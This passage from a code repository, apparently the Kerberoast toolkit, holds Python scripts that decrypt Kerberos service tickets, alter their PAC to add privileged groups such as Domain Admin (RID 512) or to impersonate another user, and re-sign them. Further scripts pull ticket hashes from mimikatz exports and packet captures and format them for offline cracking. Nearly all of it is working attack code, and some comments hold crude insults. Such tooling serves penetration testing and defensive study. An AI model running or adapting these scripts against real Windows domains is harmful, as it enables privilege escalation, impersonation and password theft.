 37 | 	# an entire spec, I don't want to. Because of this I HATE YOU. Please
 38 | 	# DIAF
 39 | 	#  -Tim
 40 | 	# P.S. Suck it
 41 | 	ticket.getComponentByPosition(5)._value = str(useful.GeneralizedTime(authtime))
 42 | 	ticket.getComponentByPosition(6)._value = str(useful.GeneralizedTime(starttime))
 43 | 	ticket.getComponentByPosition(7)._value = str(useful.GeneralizedTime(endtime))
 44 | 	ticket.getComponentByPosition(8)._value = str(useful.GeneralizedTime(renewtiltime))
 45 | 
 46 | 	return ticket
 47 | 
 48 | def addgrouptopac(pac, grouprid):
 49 | 	version, numentries, pactype, pacsize, offset = struct.unpack('<IIIII', pac[:20])
 50 | 	pac_logon_info = pac[offset:offset+pacsize]
 51 | 	return pac
 52 | 
 53 | def updateusernameinencpart(key, rawticket, username, debug=False, verbose=False):
 54 | 	try:
 55 | 		ramticket, extra = decoder.decode(rawticket)
 56 | 		serverticket = ramticket.getComponentByPosition(2)
 57 | 		localticket = ramticket.getComponentByPosition(3)
 58 | 		encserverticket = serverticket.getComponentByPosition(0).getComponentByPosition(3).getComponentByPosition(2).asOctets()
 59 | 	except:
 60 | 		raise ValueError('Unable to decode ticket. Invalid file.')
 61 | 	if verbose: print('Ticket succesfully decoded')
 62 | 
 63 | 	decserverticketraw, nonce = kerberos.decrypt(key, 2, encserverticket)
 64 | 
 65 | 	a = decoder.decode(decserverticketraw)[0]
 66 | 	a[3][1][0]._value = username
 67 | 	e = encoder.encode(a)
 68 | 
 69 | 
 70 | 	newencserverticket = kerberos.encrypt(key, 2, e, nonce)
 71 | 
 72 | 
 73 | 	ramticket.getComponentByPosition(2).getComponentByPosition(0).getComponentByPosition(3).getComponentByPosition(2)._value = newencserverticket
 74 | 
 75 | 
 76 | 	return ramticket
 77 | 
 78 | 
 79 | 
 80 | def getpac(key, rawticket, debug=False, verbose=False):
 81 | 	# attempt decoding of ticket
 82 | 	try:
 83 | 		ramticket, extra = decoder.decode(rawticket)
 84 | 		serverticket = ramticket.getComponentByPosition(2)
 85 | 		localticket = ramticket.getComponentByPosition(3)
 86 | 		encserverticket = serverticket.getComponentByPosition(0).getComponentByPosition(3).getComponentByPosition(2).asOctets()
 87 | 	except:
 88 | 		raise ValueError('Unable to decode ticket. Invalid file.')
 89 | 	if verbose: print('Ticket succesfully decoded')
 90 | 
 91 | 	decserverticketraw, nonce = kerberos.decrypt(key, 2, encserverticket)
 92 | 
 93 | 	if decserverticketraw == None:
 94 | 		raise ValueError('Unable to decrypt ticket. Invalid key.')
 95 | 	elif verbose:
 96 | 		print('Decryption successful')
 97 | 
 98 | 	
 99 | 	decserverticket, extra = decoder.decode(decserverticketraw)
100 | 
101 | 	# change the validity times in the server ticket
102 | 	updatetimestampsserverticket(decserverticket, str(decserverticket[5]), str(decserverticket[6]), str(decserverticket[7]), str(decserverticket[8]))
103 | 
104 | 	adifrelevant, extra = decoder.decode(decserverticket[9][0][1])
105 | 	pac = adifrelevant.getComponentByPosition(0).getComponentByPosition(1)
106 | 
107 | 	return bytearray(pac)
108 | 
109 | def updatepac(key, rawticket, pac, debug=False, verbose=False):
110 | 	# attempt decoding of ticket
111 | 	try:
112 | 		ramticket, extra = decoder.decode(rawticket)
113 | 		serverticket = ramticket.getComponentByPosition(2)
114 | 		localticket = ramticket.getComponentByPosition(3)
115 | 		encserverticket = serverticket.getComponentByPosition(0).getComponentByPosition(3).getComponentByPosition(2).asOctets()
116 | 	except:
117 | 		raise ValueError('Unable to decode ticket. Invalid file.')
118 | 	if verbose: print('Ticket succesfully decoded')
119 | 
120 | 	decserverticketraw, nonce = kerberos.decrypt(key, 2, encserverticket)
121 | 
122 | 	if decserverticketraw == None:
123 | 		raise ValueError('Unable to decrypt ticket. Invalid key.')
124 | 	elif verbose:
125 | 		print('Decryption successful')
126 | 
127 | 	
128 | 	decserverticket, extra = decoder.decode(decserverticketraw)
129 | 
130 | 	#for i in range(len(decserverticket[3])):
131 | 	#	print '---%i---' % i
132 | 	#	print decserverticket[3][i]
133 | 
134 | 	# change the validity times in the server ticket
135 | 	updatetimestampsserverticket(decserverticket, str(decserverticket[5]), str(decserverticket[6]), str(decserverticket[7]), str(decserverticket[8]))
136 | 
137 | 	adifrelevant, extra = decoder.decode(decserverticket[9][0][1])
138 | 
139 | 
140 | 	chksum = kerberos.chksum(key, b'\x11\x00\x00\x00', pac)
141 | 	#print 'newchecksum:  %s' %  chksum.encode('hex')
142 | 
143 | 	# repair server checksum
144 | 	newpac = pac[:-44] + chksum + pac[-28:]
145 | 	# rebuild AD-IF-RELEVANT
146 | 	#print adifrelevant
147 | 	#print dir(adifrelevant.getComponentByPosition(0).getComponentByPosition(1))
148 | 	adifrelevant.getComponentByPosition(0).getComponentByPosition(1)._value = newpac
149 | 	#print adifrelevant
150 | 	decserverticket.getComponentByPosition(9).getComponentByPosition(0).getComponentByPosition(1)._value = encoder.encode(adifrelevant)
151 | 
152 | 
153 | 	# put the ticket back together again
154 | 	newencserverticket = kerberos.encrypt(key, 2, encoder.encode(decserverticket), nonce)
155 | 	ramticket.getComponentByPosition(2).getComponentByPosition(0).getComponentByPosition(3).getComponentByPosition(2)._value = newencserverticket
156 | 
157 | 	#print decserverticket
158 | 
159 | 	return encoder.encode(ramticket)
160 | 
161 | 
162 | 
163 | if __name__ == '__main__':
164 | 	import argparse
165 | 
166 | 	parser = argparse.ArgumentParser(description='Read kerberos ticket then modify it')
167 | 	parser.add_argument('-r', '--readfile', dest='infile', action='store', required=True, 
168 | 					metavar='INFILE.kirbi', type=argparse.FileType('rb'), 
169 | 					help='the file containing the kerberos ticket exported with mimikatz')
170 | 	parser.add_argument('-w', '--outputfile', dest='outfile', action='store', required=True, 
171 | 					metavar='OUTFILE.kirbi', type=argparse.FileType('wb'), 
172 | 					help='the output file, wite hash for john the ripper to crack')
173 | 	parser.add_argument('-p', '--password', dest='password', action='store', required=False, 
174 | 					metavar='P@ss0rd1', type=str, 
175 | 					help='the password used to decrypt/encrypt the ticket')
176 | 	parser.add_argument('-t', '--nthash', dest='nthash', action='store', required=False, 
177 | 					metavar='64F12CDDAA88057E06A81B54E73B949B', type=str, 
178 | 					help='the hashed password used to decrypt/encrypt the ticket')
179 | 	parser.add_argument('-g', '--group', dest='groups', action='append', required=False, 
180 | 					metavar='512', type=int, 
181 | 					help='group rid to add (512 is Domain Admin)')
182 | 	parser.add_argument('-u', '--user', dest='userrid', action='store', required=False, 
183 | 					metavar='500', type=int, 
184 | 					help='user rid to impersonate')
185 | 	parser.add_argument('-n', '--username', dest='username', action='store', required=False, 
186 | 					metavar='yomom', type=str, 
187 | 					help='user name to impersonate')
188 | 	parser.add_argument('-v', '--verbose', dest='verbose', action='store_true', required=False, 
189 | 					default=False,
190 | 					help='verbose')
191 | 	parser.add_argument('-d', '--debug', dest='debug', action='store_true', required=False, 
192 | 					default=False,
193 | 					help='show debug messages')
194 | 	#parser.add_argument('-t', '--enctype', dest='enctype', action='store', required=False, default=2, 
195 | 	#				metavar='2', type=int, 
196 | 	#				help='message type, from RAM it is 2 (This should not need to be changed)')
197 | 
198 | 
199 | 	args = parser.parse_args()
200 | 
201 | 	# make sure a password or hash is provided
202 | 	if args.nthash == None and args.password != None:
203 | 		key = kerberos.ntlmhash(args.password)
204 | 	elif args.nthash != None:
205 | 		key = args.nthash.decode('hex')
206 | 	else:
207 | 		print("You must provide either the password (-p) or the hash (-n)")
208 | 		exit(1)
209 | 
210 | 	# read the ticket from the file
211 | 	fullraw = args.infile.read()
212 | 	args.infile.close()
213 | 	# do the rewrite
214 | 	#newticket = rewriteticket(key, fullraw,  debug=args.debug, verbose=args.verbose)
215 | 
216 | 	pac_str = getpac(key, fullraw)
217 | 
218 | 	pacobj = pac.PAC(pac=pac_str)
219 | 
220 | 	# change user rid
221 | 	if args.userrid:
222 | 		pacobj.PacLoginInfo.UserRid = args.userrid
223 | 
224 | 	# append groups
225 | 	if args.groups:
226 | 		for g in args.groups:
227 | 			if g not in pacobj.PacLoginInfo.Groups:
228 | 				pacobj.PacLoginInfo.Groups.append(g)
229 | 
230 | 	if args.username:
231 | 		pacobj.PacLoginInfo.AccountName = args.username.encode('utf-16le')
232 | 		pacobj.PacLoginInfo.DisplayName = args.username.encode('utf-16le')
233 | 		
234 | 
235 | 	pac_str = pacobj.encode()
236 | 	newticket = updatepac(key, fullraw, pac_str)
237 | 
238 | 	if args.username:
239 | 		updateusernameinencpart(key, newticket, args.username)
240 | 
241 | 
242 | 	args.outfile.write(newticket)
243 | 	args.outfile.close()
244 | 
245 | 
246 | 
247 | 
248 | 
249 | 


--------------------------------------------------------------------------------
/kerberos.py:
--------------------------------------------------------------------------------
  1 | #!/usr/bin/env python3 -tt
  2 | 
  3 | import hashlib
  4 | import hmac
  5 | from pyasn1.type import univ, char, useful, tag
  6 | from pyasn1.codec.ber import encoder, decoder
  7 | import datetime
  8 | import base64
  9 | import sys
 10 | 
 11 | #REF: http://tools.ietf.org/id/draft-brezak-win2k-krb-rc4-hmac-03.txt
 12 | 
 13 | #T = 1 for TS-ENC-TS in the AS-Request 
 14 | #T = 8 for the AS-Reply  
 15 | #T = 7 for the Authenticator in the TGS-Request 
 16 | #T = 8 for the TGS-Reply  
 17 | #T = 2 for the Server Ticket in the AP-Request 
 18 | #T = 11 for the Authenticator in the AP-Request 
 19 | #T = 12 for the Server returned AP-Reply 
 20 | #T = 15 in the generation of checksum for the MIC token 
 21 | #T = 0 in the generation of sequence number for the MIC token  
 22 | #T = 13 in the generation of checksum for the WRAP token 
 23 | #T = 0 in the generation of sequence number for the WRAP token  
 24 | #T = 0 in the generation of encrypted data for the WRAPPED token
 25 | 
 26 | 
 27 | def ntlmhash(s):
 28 |     hash = hashlib.new('md4', s.encode('utf-16le')).digest()
 29 |     return hash
 30 |     #return binascii.hexlify(hash)
 31 | 
 32 | def rc4crypt(key, data):
 33 |     x = 0
 34 |     box = list(range(256))
 35 |     for i in range(256):
 36 |         x = (x + box[i] + (key[i % len(key)])) % 256
 37 |         box[i], box[x] = box[x], box[i]
 38 |     x = 0
 39 |     y = 0
 40 |     out = b''
 41 |     for char in data:
 42 |         x = (x + 1) % 256
 43 |         y = (y + box[x]) % 256
 44 |         box[x], box[y] = box[y], box[x]
 45 |         out += bytes([char ^ box[(box[x] + box[y]) % 256]])
 46 |     return out
 47 | 
 48 | 
 49 | 
 50 | #print decoder.decode(enc)
 51 | 
 52 | #define KERB_ETYPE_RC4_HMAC             23
 53 | KERB_ETYPE_RC4_HMAC = 23
 54 | #define KERB_ETYPE_RC4_HMAC_EXP         24
 55 | 
 56 | def decrypt(key, messagetype, edata):
 57 |     #DECRYPT (K, fRC4_EXP, T, edata, edata_len, data, data_len) 
 58 |     #{ 
 59 |     #    if (fRC4_EXP){ 
 60 |     #        *((DWORD *)(L40+10)) = T; 
 61 |     #        HMAC (K, L40, 14, K1); 
 62 |     #    }else{ 
 63 |     #        HMAC (K, &T, 4, K1); 
 64 |     #    } 
 65 |     #K1 = hmac.new(key, chr(messagetype) + "\x00\x00\x00", hashlib.md5).digest() # \x0b = 11
 66 |     K1 = hmac.new(key, bytes([messagetype]) + b"\x00\x00\x00", hashlib.md5).digest() # \x0b = 11
 67 |     #    memcpy (K2, K1, 16); 
 68 |     K2 = K1
 69 | 
 70 |     #    if (fRC4_EXP) memset (K1+7, 0xAB, 9); 
 71 |     #    HMAC (K1, edata, 16, K3); // checksum is at edata 
 72 |     K3 = hmac.new(K1, edata[:16], hashlib.md5).digest()
 73 |     #    RC4(K3, edata + 16, edata_len - 16, edata + 16); 
 74 |     ddata = rc4crypt(K3, edata[16:])
 75 |     #    data_len = edata_len - 16 - 8; 
 76 |     #    memcpy (data, edata + 16 + 8, data_len);
 77 |     #     
 78 |     #    // verify generated and received checksums 
 79 |     #    HMAC (K2, edata + 16, edata_len - 16, checksum); 
 80 |     checksum = hmac.new(K2, ddata, hashlib.md5).digest()
 81 |     #    if (memcmp(edata, checksum, 16) != 0)  
 82 |     #        printf("CHECKSUM ERROR  !!!!!!\n"); 
 83 |     #}
 84 |     if checksum == edata[:16]: 
 85 |         #print "Decrypt Checksum: %s" % str(checksum).encode('hex') # == edata[:16])
 86 |         #print "Checksum Calc: %s" % str(checksum).encode('hex')
 87 |         #print "Checksum Pkct: %s" % str(edata[:16]).encode('hex')
 88 |         #print messagetype
 89 |         #print data
 90 |         #print "Nonce: %s" % ddata[:8].encode('hex')
 91 |         #return ddata[8:] # first 8 bytes are nonce, the rest is data
 92 |         #return { 
 93 |         #    'data': ddata[8:],
 94 |         #    'nonce': ddata[:8]
 95 |         #}
 96 |         return ddata[8:], ddata[:8]
 97 |     else:
 98 |         #print "CHECKSUM ERROR!"
 99 |         return None, None
100 | 
101 | def encrypt(key, messagetype, data, nonce):
102 |     #  if (fRC4_EXP){ 
103 |     #      *((DWORD *)(L40+10)) = T; 
104 |     #      HMAC (K, L40, 10 + 4, K1); 
105 |     #  }else{ 
106 |     #      HMAC (K, &T, 4, K1); 
107 |     #  }
108 |     K1 = hmac.new(key, bytes(messagetype) + b'\x00\x00\x00', hashlib.md5).digest() # \x0b = 11
109 |     #  memcpy (K2, K1, 16);
110 |     K2 = K1 
111 |     #  if (fRC4_EXP) memset (K1+7, 0xAB, 9); 
112 |     #  add_8_random_bytes(data, data_len, conf_plus_data); 
113 |     ddata = nonce + data
114 |     #  HMAC (K2, conf_plus_data, 8 + data_len, checksum); 
115 |     checksum = hmac.new(K2, ddata, hashlib.md5).digest()
116 |     #  HMAC (K1, checksum, 16, K3); 
117 |     K3 = hmac.new(K1, checksum, hashlib.md5).digest()
118 |     #print "K3: %s" % K3.encode('hex')
119 |     
120 |     #  RC4(K3, conf_plus_data, 8 + data_len, edata + 16); 
121 |     # print "EN DDATA: %s" % ddata[:32].encode('hex')
122 |     edata = rc4crypt(K3, ddata)
123 |     
124 |     #  memcpy (edata, checksum, 16); 
125 |     #  edata_len = 16 + 8 + data_len; 
126 |     return checksum + edata
127 | 
128 | def zerosigs(data):
129 |     d = list(map(ord, str(data)))
130 |     for i in range(5, 21): # zero out the 16 char sig, KDC
131 |         d[len(d) - i] = 0
132 |     for i in range(29, 45): # zero out the 16 char sig, Server
133 |         d[len(d) - i] = 0
134 | 
135 |     retval = "".join(map(chr, d))
136 |     #print retval.encode('hex')
137 | 
138 | 
139 |     return bytearray(retval,"utf-8")
140 | 
141 | def chksum(K, T, data):
142 |     data = zerosigs(data)
143 | 
144 |     # K = the Key
145 |     #T = the message type, encoded as a little-endian four-byte integer
146 | 
147 |     #Ksign = HMAC(K, "signaturekey")  //includes zero octet at end
148 |     SIGNATUREKEY = b'signaturekey\x00'
149 |     Ksign = hmac.new(K, SIGNATUREKEY, hashlib.md5).digest()
150 |     #tmp = MD5(concat(T, data))
151 |     tmp = hashlib.md5(T + data).digest()
152 |     #CHKSUM = HMAC(Ksign, tmp)
153 |     chksum = hmac.new(Ksign, tmp, hashlib.md5).digest()
154 |     return chksum
155 | 
156 | def getservsig(encchunk):
157 |     return str(encchunk[-44:-28])
158 | 
159 | def getprivsig(encchunk):
160 |     return str(encchunk[-20:-4])
161 | 
162 | def printdecode(kerbpayload, ktype=2):
163 |     d = decoder.decode(kerbpayload)
164 |     if ktype == 32:
165 |         #print "Protocol Version (pvno):  " + str(d[0][0])
166 |         print("Message Type:             " + str(d[0][1]))
167 |         print("Realm:                    " + str(d[0][2]))
168 |         print("Principal:                " + str(d[0][3][1][0]))
169 |         print("Ticket Version (tkt-vno): " + str(d[0][4][0]))
170 |         print("Ticket Realm:             " + str(d[0][4][1]))
171 |         #print "Name-Type (Service & Instance): " + str(d[0][4][2][0])
172 |         print("Server, Name:             " + str(d[0][4][2][1][0]))
173 |         print("Server, Name:             " + str(d[0][4][2][1][1]))
174 |         #print "Data:                     " + str(d[0][4][3][2]).encode('hex')
175 | 
176 |         #print "Encryption Type: :        " + str(d[0][5][0])
177 |         #print "Data:                     " + str(d[0])
178 |         #print "Server Realm:             " + str(d[0][4][2][4])
179 |     elif ktype == 2:
180 |         print("a")
181 | 
182 | def extract_ticket_from_kirbi(filename):
183 |     with open(filename, 'rb') as fd:
184 |         data = fd.read()
185 |         return extract_ticket(data)
186 | 
187 | def extract_ticket(data):
188 |     if data[0] == 0x76:
189 |         # ram dump 
190 |         #enctickets.append(((decoder.decode(data)[0][2][0][3][2]).asOctets(), i, f))
191 |         return (decoder.decode(data)[0][2][0][3][2]).asOctets()
192 |     elif data[:2] == b'6d':
193 |         # honestly, i completely forgot. I think this is from a pcap -Tim
194 |         #enctickets.append(((decoder.decode(ticket.decode('hex'))[0][4][3][2]).asOctets(), i, f))
195 |         return (decoder.decode(ticket.decode('hex'))[0][4][3][2]).asOctets()
196 | 
197 | 


--------------------------------------------------------------------------------
/kirbi2john.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env -S python3 -tt
 2 | # Based on the Kerberoast script from Tim Medin to extract the Kerberos tickets
 3 | # from a kirbi file.
 4 | # Modification to parse them into the JTR-format by Michael Kramer (SySS GmbH)
 5 | # Copyright [2015] [Tim Medin, Michael Kramer]
 6 | #
 7 | # Licensed under the Apache License, Version 2.0 (the "License");
 8 | # you may not use this file except in compliance with the License.
 9 | # You may obtain a copy of the License at
10 | #
11 | #    http://www.apache.org/licenses/LICENSE-2.0
12 | #
13 | # Unless required by applicable law or agreed to in writing, software
14 | # distributed under the License is distributed on an "AS IS" BASIS,
15 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
16 | # See the License for the specific language governing permissions and
17 | # limitations under the License
18 | 
19 | from pyasn1.codec.ber import encoder, decoder
20 | import glob
21 | import kerberos
22 | 
23 | 
24 | if __name__ == '__main__':
25 | 	import argparse
26 | 	import sys
27 | 
28 | 	parser = argparse.ArgumentParser(description='Read Mimikatz kerberos ticket then modify it and save it in crack_file')
29 | 	parser.add_argument('-o', dest='crack_file', metavar='crack_file', type=argparse.FileType('w'), default=sys.stdout, nargs='?',
30 | 					help='File to save crackable output to (default is stdout')
31 | 	parser.add_argument('files', nargs='+', metavar='file.kirbi', type=str,
32 | 					help='File name to crack. Use asterisk \'*\' for many files.\n Files are exported with mimikatz or from extracttgsrepfrompcap.py')
33 | 
34 | 	args = parser.parse_args()
35 | 
36 | 	enctickets = []
37 | 
38 | 	for path in args.files:
39 | 		for filename in glob.glob(path):
40 | 			et = kerberos.extract_ticket_from_kirbi(filename)
41 | 			if et:
42 | 				enctickets.append((et,filename))
43 | 
44 | 	#out=open("crack_file","wb")
45 | 	for et in enctickets:
46 | 		filename = et[1].split('/')[-1].split('\\')[-1].replace('.kirbi','')
47 | 
48 | 		out = '$krb5tgs$23$*' + filename + '*$' + et[0][:16].hex() + '$' +et[0][16:].hex() + '\n'
49 | 
50 | 		args.crack_file.writelines(out)
51 | 	sys.stderr.write('tickets written: ' + str(len(enctickets)) + '\n')
52 | 


--------------------------------------------------------------------------------
/krbroast-pcap2hashcat.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python3 -tt
 2 | 
 3 | from scapy.all import *
 4 | import struct
 5 | import codecs
 6 | from pyasn1.codec.ber import encoder, decoder
 7 | 
 8 | 
 9 | MESSAGETYPEOFFSETUDP = 17
10 | MESSAGETYPEOFFSETTCP = 21
11 | DEBUG = True
12 | 
13 | TGS_REP = 13
14 | 
15 | def findkerbpayloads(packets, verbose=False):
16 | 	kploads = []
17 | 	i = 1
18 | 	unfinished = {}
19 | 	for p in packets:
20 | 		# UDP
21 | 		if p.haslayer(UDP) and p.sport == 88 and p[UDP].load[MESSAGETYPEOFFSETUDP] == TGS_REP:
22 | 			if verbose: print("found UDP payload of size %i" % len(p[UDP].load) )
23 | 			kploads.append(p[UDP].load)
24 | 
25 | 		#TCP
26 | 		elif p.haslayer(TCP) and p.sport == 88 and p[TCP].flags & 23== 16: #ACK Only, ignore push (8), urg (32), and ECE (64+128)
27 | 			# assumes that each TCP packet contains the full payload
28 | 
29 | 			try:
30 | 				payload = p[TCP].load
31 | 			except:
32 | 				continue
33 | 
34 | 			if len(payload) > MESSAGETYPEOFFSETTCP and payload[MESSAGETYPEOFFSETTCP] == TGS_REP:
35 | 				# found start of new TGS-REP
36 | 				size = struct.unpack(">I", payload[:4])[0]
37 | 				if size + 4 == len(payload):
38 | 					kploads.append(payload[4:size+4]) # strip the size field
39 | 				else:
40 | 					#print('ERROR: Size is incorrect: %i vs %i' % (size, len(payload)))
41 | 					unfinished[(p[IP].src, p[IP].dst, p[TCP].dport)] = (payload[4:size+4], size)
42 | 				if verbose: print("found TCP payload of size %i" % size)
43 | 			elif (p[IP].src, p[IP].dst, p[TCP].dport) in unfinished:
44 | 				ticketdata, size = unfinished.pop((p[IP].src, p[IP].dst, p[TCP].dport))
45 | 				ticketdata += payload
46 | 				#print("cont: %i %i" % (len(ticketdata), size))
47 | 				if len(ticketdata) == size:
48 | 					kploads.append(ticketdata)
49 | 				elif len(ticketdata) < size:
50 | 					unfinished[(p[IP].src, p[IP].dst, p[TCP].dport)] = (ticketdata, size)
51 | 				else:
52 | 					# OH NO! Oversized!
53 | 					print('Too much data received! Source: %s Dest: %s DPort %i' % (p[IP].src, p[IP].dst, p[TCP].dport))
54 | 
55 | 
56 | 	return kploads
57 | 
58 | 
59 | 
60 | if __name__ == '__main__':
61 | 	import argparse
62 | 
63 | 	parser = argparse.ArgumentParser(description='Find TGS_REP packets in a pcap file and write them for use cracking')
64 | 	parser.add_argument('-f', '--pcap', dest='pcaps', action='append', required=True,
65 | 					metavar='PCAPFILE', #type=file, #argparse.FileType('r'), 
66 | 					help='a file to search for Kerberos TGS_REP packets')
67 | 	parser.add_argument('-w', '--outputfile', dest='outfile', action='store', required=False, 
68 | 					metavar='OUTPUTFILE', type=argparse.FileType('w'), 
69 | 					help='the output file')
70 | 	parser.add_argument('-v', '--verbose', dest='verbose', action='store_true', default=False,
71 | 					help='display verbose messages')
72 | 
73 | 	args = parser.parse_args()
74 | 	kploads = []
75 | 	for f in args.pcaps:
76 | 		packets = rdpcap(f)
77 | 		kploads += findkerbpayloads(packets, args.verbose)
78 | 
79 | 	if len(kploads) == 0:
80 | 		print('no payloads found')
81 | 		sys.exit(0)
82 | 
83 | 	if args.outfile:
84 | 		print('writing %i hex encoded payloads to %s' % (len(kploads), args.outfile.name))
85 | 	
86 | 	decode_hex = codecs.getdecoder("hex_codec")
87 | 	for p in kploads:
88 | 		encticket = decoder.decode(p)[0][4][3][2].asOctets().hex()
89 | 		out = "$krb5tgs$23$*user$realm$test/spn*$" + encticket[:32] + "$" + encticket[32:]
90 | 
91 | 		if args.outfile:
92 | 			args.outfile.write(out + '\n')
93 | 		else:
94 | 			print(out)


--------------------------------------------------------------------------------
/pac.py:
--------------------------------------------------------------------------------
  1 | #!/usr/bin/env python3 -tt
  2 | 
  3 | import struct
  4 | import collections
  5 | from abc import ABCMeta, abstractmethod
  6 | #from datetime import datetime,timedelta
  7 | import datetime
  8 | import math
  9 | 
 10 | def BytesToTime(b):
 11 | 	# The FILETIME structure is a 64-bit value that represents the number of 
 12 | 	# 100-nanosecond intervals that have elapsed since January 1, 1601 (UTC).
 13 | 	mftime = struct.unpack('<Q', b)[0]	
 14 | 	if mftime == 0x7fffffffffffffff:
 15 | 		return None
 16 | 	else:
 17 | 		microseconds = struct.unpack('<Q', b)[0] / 10.0
 18 | 		nanoseconds = (struct.unpack('<Q', b)[0] % 10000000) * 100
 19 | 		
 20 | 		dt = datetime.datetime(1601,1,1) + datetime.timedelta(microseconds=microseconds)
 21 | 
 22 | 		dtn  = datetimenano(dt, nanosecond=nanoseconds)
 23 | 
 24 | 		return dtn
 25 | 
 26 | def TimeToBytes(time):
 27 | 	if time == None:
 28 | 		return b'\xff\xff\xff\xff\xff\xff\xff\x7f' # 0x7fffffffffffffff LE
 29 | 	else:
 30 | 		td = time - datetime.datetime(1601,1,1)
 31 | 		#seconds = math.floor(td.total_seconds())
 32 | 		hundredsofnano = int(math.floor(td.total_seconds()) * 10000000)
 33 | 
 34 | 		if hasattr(time, 'nanosecond'):
 35 | 			hundredsofnano += int(time.nanosecond / 100)
 36 | 		else:
 37 | 			hundredsofnano += int(time.microseconds * 10)
 38 | 
 39 | 		return struct.pack('<Q', hundredsofnano)
 40 | 
 41 | 		'''
 42 | 		if hasattr(time, 'nanosecond'):
 43 | 			#microseconds = ((td.total_seconds() * 1000000) + td.microseconds)
 44 | 			#replace microseconds for nanoseconds
 45 | 			#microseconds = microseconds - time.microsecond
 46 | 			#nanoseconds = microseconds * 1000 + time.nanoseconds
 47 | 			nanoseconds = ((td.total_seconds() * 1000000000) + time.nanosecond)
 48 | 
 49 | 			print 'seconds     %i' % (math.floor(td.total_seconds()))
 50 | 			print 'nanoseconds %i' % time.nanosecond
 51 | 
 52 | 			return struct.pack('<Q', nanoseconds)
 53 | 			hundredsofnano = nanoseconds / 100
 54 | 		else:
 55 | 			#microseconds = ((td.total_seconds() * 1000000) + td.microseconds) * 10
 56 | 			microseconds = ((td.total_seconds() * 1000000) + td.microseconds)
 57 | 			hundredsofnano = microseconds * 10
 58 | 		print '%15f' % hundredsofnano
 59 | 		return struct.pack('<Q', hundredsofnano)
 60 | 		'''
 61 | 
 62 | def PrettyTime(time):
 63 | 	if time == None:
 64 | 		return 'Infinity'
 65 | 	else:
 66 | 		return str(time)
 67 | 
 68 | def AlignedString(s, alignment = 4):
 69 | 	if type(s)==str:
 70 | 		return bytearray(s,"utf-8") + b'\x00' * ((alignment - (len(s) % alignment)) % alignment)
 71 | 	else:
 72 | 		return s + b'\x00' * ((alignment - (len(s) % alignment)) % alignment)
 73 | 
 74 | 
 75 | 
 76 | class datetimenano(datetime.datetime):
 77 | 	def __new__(cls, *args, **kwargs):
 78 | 		if len(args) > 0 and type(args[0]) == datetime.datetime:
 79 | 			dt = args[0]
 80 | 
 81 | 			#dt = datetime.datetime.__new__(cls, dt.year, dt.month, dt.day, dt.hour, dt.minute, dt.second, dt.microsecond, dt.tzinfo)
 82 | 			if 'nanosecond' in kwargs:
 83 | 				#setattr(dt, 'nanoseconds', args[0].tzinfo)
 84 | 				dt = datetime.datetime.__new__(cls, dt.year, dt.month, dt.day, dt.hour, dt.minute, dt.second, dt.microsecond, dt.tzinfo)
 85 | 				setattr(dt, 'nanosecond', kwargs['nanosecond'])
 86 | 			else:
 87 | 				#setattr(dt, 'nanoseconds', 0)
 88 | 				dt = datetime.datetime.__new__(cls, dt.year, dt.month, dt.day, dt.hour, dt.minute, dt.second, dt.microsecond, dt.tzinfo, nanoseconds=0)
 89 | 				setattr(dt, 'nanosecond', 0)
 90 | 			return dt
 91 | 		else:
 92 | 			dt = super(datetimenano, cls).__new__(cls, *args[:8], **kwargs)
 93 | 			if len(args) == 9:
 94 | 				setattr(cls, 'nanosecond', args[8])
 95 | 			else:
 96 | 				setattr(cls, 'nanosecond', 0)
 97 | 			return dt			
 98 | 
 99 | 	def __str__(self):
100 | 		s = super(datetimenano, self).__str__()
101 | 		return '%s.%09i' % (s.split('.')[0], self.nanosecond)
102 | 		return s
103 | 
104 | class PacInfoStructure(object, metaclass=ABCMeta):
105 | 	PrettyName = 'PacInfoStructure'
106 | 
107 | 	Type = None
108 | 	PrettyName = None
109 | 	BufferSize = None
110 | 	Offset = None
111 | 	Data = None
112 | 
113 | 
114 | 	def __init__(self, pac, index=0):
115 | 		if input != None:
116 | 			offset = 8 + 16 * index
117 | 
118 | 			self.Type, self.BufferSize, self.Offset = struct.unpack('<III', pac[offset:offset+12])
119 | 			self.Data = pac[self.Offset:self.Offset+self.BufferSize]
120 | 
121 | 	def __str__(self):
122 | 		return '%s (%i) Size: %i  Offset: %i\nData: %s' % (self.PrettyName, self.Type, self.BufferSize, self.Offset, self.Data.hex())
123 | 
124 | 	#def encode(self):
125 | 	#	e = str(struct.pack('<III', self.Type, self.BufferSize, self.Offset)) + self.encode()
126 | 	#	return e
127 | 
128 | 	#@abstractmethod
129 | 	def encode(self):
130 | 		return self.Data
131 | 
132 | class PacLoginInfo(PacInfoStructure):
133 | 	Version = None
134 | 	ByteOrder = None
135 | 	HeaderLen = None
136 | 	FillBytes = None
137 | 	InitialLength = None
138 | 
139 | 	Type = 1
140 | 	PrettyName = 'Login Info'
141 | 	#ReferentID = None
142 | 	LogonTime = None
143 | 	KickoffTime = None
144 | 	PwdLastSet = None
145 | 	PwdCanChange = None
146 | 	PwdMustChange = None
147 | 
148 | 	Logoncount = None
149 | 	BadpPasswordCount = None
150 | 	UserRid = None
151 | 	GroupRid = None
152 | 	
153 | 	AccountName = None
154 | 	DisplayName = None
155 | 	LogonScript = None
156 | 	ProfilePath = None
157 | 	HomeDir = None
158 | 	DirDrive = None
159 | 
160 | 
161 | 
162 | 	#LogonCount
163 | 
164 | 	class Referent(object):
165 | 		Length = None
166 | 		Size = None
167 | 		ReferentID = None
168 | 		Groups = []
169 | 
170 | 		def __init__(self, data):
171 | 			self.Length = struct.unpack('<H', data[0:2])[0]
172 | 			self.Size = struct.unpack('<H', data[2:4])[0]
173 | 			self.ReferentID = struct.unpack('<L', data[4:8])[0]
174 | 
175 | 		def __str__(self):
176 | 			return 'Length: %i  Size: %i  ReferentID: 0x%08x' % (self.Length, self.Size, self.ReferentID)
177 | 
178 | 		@property
179 | 		def PaddLen(self):
180 | 			# must bye 4 byte aligned
181 | 			return (4 - (self.Length % 4)) % 4
182 | 
183 | 	def __init__(self, pac, index=0):
184 | 		super(self.__class__, self).__init__(pac, index)
185 | 		if self.Type != 1:
186 | 			raise ValueError('PAC Information Structure is not Login Info')
187 | 
188 | 		#self.MesHeader = self.Data[0:16]
189 | 		#MessageHeader
